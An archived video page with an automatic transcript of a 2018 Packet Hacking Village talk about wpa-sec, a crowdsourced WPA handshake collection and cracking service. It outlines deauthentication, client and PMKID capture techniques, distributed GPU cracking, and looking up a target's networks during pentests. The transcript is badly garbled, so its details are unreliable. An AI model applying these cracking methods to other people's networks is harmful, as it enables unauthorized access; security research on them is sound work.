PACKET HACKING VILLAGE - WPA-SEC: The largest online WPA handshake database

Video thumbnail (Frame 0) Video thumbnail (Frame 924) Video thumbnail (Frame 1762) Video thumbnail (Frame 3263) Video thumbnail (Frame 4558) Video thumbnail (Frame 5367) Video thumbnail (Frame 7965) Video thumbnail (Frame 9061) Video thumbnail (Frame 11284) Video thumbnail (Frame 13641) Video thumbnail (Frame 15707) Video thumbnail (Frame 17478) Video thumbnail (Frame 19995) Video thumbnail (Frame 20656) Video thumbnail (Frame 21506) Video thumbnail (Frame 24791) Video thumbnail (Frame 27118)
Video in TIB AV-Portal: PACKET HACKING VILLAGE - WPA-SEC: The largest online WPA handshake database

Formal Metadata

Title
PACKET HACKING VILLAGE - WPA-SEC: The largest online WPA handshake database
Title of Series
Author
License
CC Attribution 3.0 Unported:
You are free to use, adapt and copy, distribute and transmit the work or content in adapted or unchanged form for any legal purpose as long as the work is attributed to the author in the manner specified by the author or licensor.
Identifiers
Publisher
Release Date
2018
Language
English

Content Metadata

Subject Area
Abstract
Started as pet project in 2011, wpa-sec collects WPA handshake captures from all over the world. Contributors use client script to download handshakes and special crafted dictionaries to initiate attack against PSKs. With more than 115 GB captures from 240 000 submissions, collected samples represent invaluable source for wireless security research. This includes: Many improvements for emerging wireless security tools like hcxtools suite. Identified default PSK key generation algorithms, used by various ISPs. Those, along with fixes for current implementations get in RouterKeygen project. Many more to come, based on current research activities Performance optimizations for WPA crackers Identified some linux kernel driver bugs During the talk I will explain how wpa-sec works, provide statistics and a lot internals on optimization and how to use the database as OSINT source during pentests and red team actions.
Presentation of a group Database Database
Purchasing Slide rule Scripting language Thread (computing) Open source Ripping Algorithm Texture mapping Motion capture Set (mathematics) Real-time operating system Data dictionary Power (physics) Revision control Hash function Software Process (computing) System identification Electric generator Bit Ripping Software Repository (publishing) Funknetz Video game Wireless LAN Resultant
Greedy algorithm Data dictionary Algorithm Distribution (mathematics) Electric generator Service (economics) Algorithm Water vapor Motion capture Data dictionary Mereology Statistics Bridging (networking) Personal digital assistant Spacetime Resultant
Server (computing) Beta function Ripping Algorithm Multiplication sign Motion capture Client (computing) Mereology Data transmission Revision control Array data structure Mathematics Green's function Energy level PLS (file format) Socket-Schnittstelle Axiom of choice Information Poisson-Klammer Client (computing) Knot Connected space Doubling the cube Hash function Sinc function
Frame problem Asynchronous Transfer Mode Control flow Insertion loss BEEP Mereology Proper map Field (computer science) Power (physics) Element (mathematics) Sequence Revision control Mathematics Internet forum Phase transition Hash function Uniqueness quantification Router (computing) Associative property Information Block (periodic table) Computer network Database Motion capture Message passing Software Hash function Function (mathematics) Password Information security Resultant Asynchronous Transfer Mode Associative property
NP-hard Server (computing) Adaptive behavior Motion capture Image registration Food energy Bookmark (World Wide Web) Magnetic stripe card Power (physics) Pi Average Hash function Query language Electronic visual display Software cracking Process (computing) Router (computing) Rule of inference Host Identity Protocol Key (cryptography) Venn diagram Motion capture Type theory Uniform resource locator Process (computing) Software Computer hardware Window Resultant Asynchronous Transfer Mode
Graphics processing unit Validity (statistics) View (database) Multiplication sign Counting Client (computing) Data dictionary Mereology 2 (number) Number Product (business) Power (physics) Local Group Cache (computing) Word Software Kernel (computing) Hash function Software cracking Hill differential equation Resultant Electric current Graphics processing unit
Dialect Overhead (computing) Randomization Multiplication sign Client (computing) Real-time operating system Data dictionary Local Group Digital photography Kernel (computing) Password Hash function Router (computing) Electric current Graphics processing unit
Email Client (computing) Mereology Software bug Different (Kate Ryan album) Phase transition Query language Source code Algorithm Email Touchscreen Building Hash function Interface (computing) Software testing Remote procedure call Resultant Sinc function Router (computing) Frame problem Server (computing) Implementation Link (knot theory) Chemical equation Authentication Device driver Wave packet Revision control Goodness of fit Root Internet forum Customer relationship management Computer hardware Spacetime Software testing Communications protocol Router (computing) Reverse engineering Firmware Mathematical optimization Default (computer science) User interface Default (computer science) Demo (music) Projective plane Database Device driver Mathematics Kernel (computing) Query language Password √Ąquivalenzprinzip <Physik>
Beat (acoustics) Infinite conjugacy class property Ripping
and so we are now ready for our third presentation of the day at the third presentation of the day Alex from play show you from Bulgaria correct oh great all right ah so it is my pleasure to introduce to you you're going to be giving a talk on WPA check Alex Donna thank you guys so today I will talk about the WPA sick which is currently the largest no handshake WPA handshake database so what exactly is
this we are doing collection and purchasing of a wireless network captures which are submitted by our users then we identified these handshakes we maintain carefully crafted dictionaries to check down snapped and there are contributors that are contributing their GPO power so I can try to crack these handshakes and submit all the results in real time which are available so TT a sec works with several
open source tools the WPA sec is also open source and you can see over there whenever slide the life installation and the github repository thread so we are using the XX tools for handshake and notification a check tooth is a very interesting set of two it's pretty new from it's developed since one year maybe a bit more and the other is well known rotor king and pc which works for they'd find that no PSK generation alberto's of course the cracking is done by hash get and john the ripper updating version and we use we go thanks to the guys from there for our AP geolocation
so the bridge starts about the service we now have more than half a million handshakes submitted as I see them we're doing this since 2011 so this is a the whole Sarah water handshakes you see the rockatuer data and our success is around 27% no algorithm generation was hitting around 5% but thank you oh we can do better yeah and from our crafted dictionaries it's around 10% of the case plates or a crack because as you know this is pretty greedy algorithm to crack and these are the good results there because we are striving for more the new distribution
based on wiggle results you can see there is there is not place where you can't kept I can't change them so a lot of people are submitting our users are around 4000 so this is pretty much very team to see how what I use it users using on different parts of the world so
let's see what we're doing there first we have to get the handshake we all know that how does this happen so our be using back in time the old cool ap attack don't indicate active quads and get the change Jake right this is very good because we can extract the APPA CD and then we can do okay that's AP but as you also know in combat arrays or do bad connection to transmissions etc with maybe in some places you have to apply the a penis correction of course we can do better and you know do a pls attack so we can attack directly the client which is also not on your think at least and there is no need for those correction since we control the work for with that plant and here we have to be very fast we have to work better and there is no need for 80 knots correction and of course we come average some more interesting attacks on higher levels the two that we are suggesting to use for submissions in double Kasich is hmm - which is part of HDX tools and since last week it have a lot of more interesting features and of course before submitting to the beta base please don't green work on this do anything with these captures because you may destroy some valuable information that's in there the bracket
part is also very well known you know I don't think that I have to explain that but basically typically f do shit eight ish eight eight one and after that depending on the version of WPA were using the H my md5 edge package a one or with level PA to see Mac we're using o Mac so this is so implemented in John the Ripper and hash captains of course it's implemented in double basic server side so we can do it better about the
most Corrections we know although about the most correction and we are very much using it because we don't know to spend years for many GPU power to correct something that can be cracked in the end we can also try to rely on the replay counter field so we have to know what exactly the mouse correction we'll use but this is not very good solution because often the a piece keep the same break after field so from the database around 5% of all his half a million and chicks that were cracked because not all not everyone of this half million was cracked opposed just like 7% so we needed a not correction 5% of these headshakes the most correction can be negative or positive you see the person's can be implemented as a mathematics with became Ian evolve in Ian's here you see the results of course a lot of proton routers beeps beso became them and it's not about seeing around 90% of those again of course xx tools can deal with this situation so it can reduce this a lot so the new kid on
the block the pmcid I believe Martin wrote on the forum post button the last version of hash get has these additional modes it was released just before back home so the idea here is that if you have a network with roaming enabled and computing the I stand out we will have this plk ID which is part of every same information element here you see the values that how is a PMP value calculated so here we just need the make a pee Mak asta and which come from the special requests especially the rare association request proper spawns and you need the message one from the year pool so there is no need for all this hard to get parts of the handshakes like before of course there is no need from loss correction so if you get that Phe ID it will be on the safe side that your cracking if you have this dictionary this password from the dictionary you will get it so next part
is the hard work what we are using to collect that of course everybody builds his favorites girl we are using raspberry PI's like this one what you see here is a display ePaper display doctor is not using any more power that we need and with this it's a problem big battery but can you run this for two or three days that's talking the adapters using kids are running based or anything that works better xx tools you can see you can find different types of the doctors that we have tested to know that working here you see the poverty big based device with hard work antenna mode which just toppling battery power to turn all this is very cheap and of course here it's again a Raspberry Pi based solution but with way better antenna that give us a lot more power because you can use whatever you want
for this so when you alright when you have the captures and the first thing that we have to do is to issue all that will be sex key there is no some striped registration process we just go hip issue key and that's it so with this key you can access the results when they are cracked on the server side processing with the HDX pcap - we check for duplicates of course a lot more like trying to crack the APN key so if we already have this network with this is ID which will get the hidden there is no need for this whole thing to go to the crackers to exhaust their energy between the window AVG location and of course if we are not having the results from router kick in PC this goes to energy crackers so the
guys that previously mined connoisseur I don't know their favorite crypto currency they can spend one of their gpus drum he'll crack this downloads the handshakes in dictionaries and feed them to cracker it starts with all the strange shakes and with told teachers not by with fewer words and this gives some fair results for most people what we are doing here is because we have so much handshakes we within the ESA geek combined so we are fetching all networks that have one and the same Esad so we are doing the heavy productivity ref2 just once and we attacking our dictionaries the other part is automatic dictionary count because if you have very powerful GPU for one of these small dictionaries that we see for our one with word count in it you're spending around 30 seconds to initialize the GPU and after that for example three or four seconds to push the full dictionary there so we're combining dictionaries automatically so it's killing the pending cunt number of GPUs we have and the GPU power with when every something
is cracked you accept it one more piece came back special boy a cache of the network or the bcad we're doing the validations as far as we can and in Europe time we generate this correct the dictionary it's over the okay so over
there so it's real time you can get every password that has been correct
yeah and there is a separate dictionary that is photos that are coming from router K again they are separated because most of the time they look very random stinks of course they are not so random that's why they can't get to the router k again and but they are not really interesting if you want to use this dictionary for your your own assessments so what we've
learned up now there are how what what vendors entice piece that is still using default it BSE Esad based algorithms in the database there are what are these you know and we hope to get them reeled to identified this continue to that there is a lot of it it's not going to in this part what people get the router firmware catch it and try to find this default are good doesn't with this with WPA SEC results we are validating their results and it gets pretty interesting now what devote of course the top link such a tool like execs tools gets we hit a lot of Linux kernel and Driver books we try to fill as much as possible bugs on top of them are already are already fixed so this is a good thing for everyone that is using such a hardware we also identified some optimizations and improvements in hash getting generated the Republic apps it was also those better and in the end the root ASIC is very useful as awesomesauce because for example you're doing a remote penetration test and some Bank you also can go on WP exact and on we go see what are the metros there after that go to WP a second see if somebody already captured some retro hash there so from now on you will be wait for you already have something to work on and to try for password reuse and etc and
what's next with this project it's running some years but I'm sure that they are a lot of more hidden algorithms and we'll be very glad to check those out the interesting thing about this default important stuff there is in from demo different forums which isn't the cetera very very spread and not really useful when you look for something and I think it this will be a nice place to collect them all and to improve it of course the web interface I really don't have a full screen show because it's really awful but this to be gone from mighty insolent we have to do something better of course it would be nice to introduce young API for DB query so a lot of guys will have the possibility to dick in this database but for now if you have some ideas I'll be very happy to discuss now just drop me a mail and we work it out and of course prepare for double big train there's some speculations I'm sure that you'll think of something but let's see the first client implementations and server calls so we'll see how this captain but since in 2000 we still pass out that will it be and that will be a first version so I'm sure this will not
go around so so thank you guys [Applause]
Feedback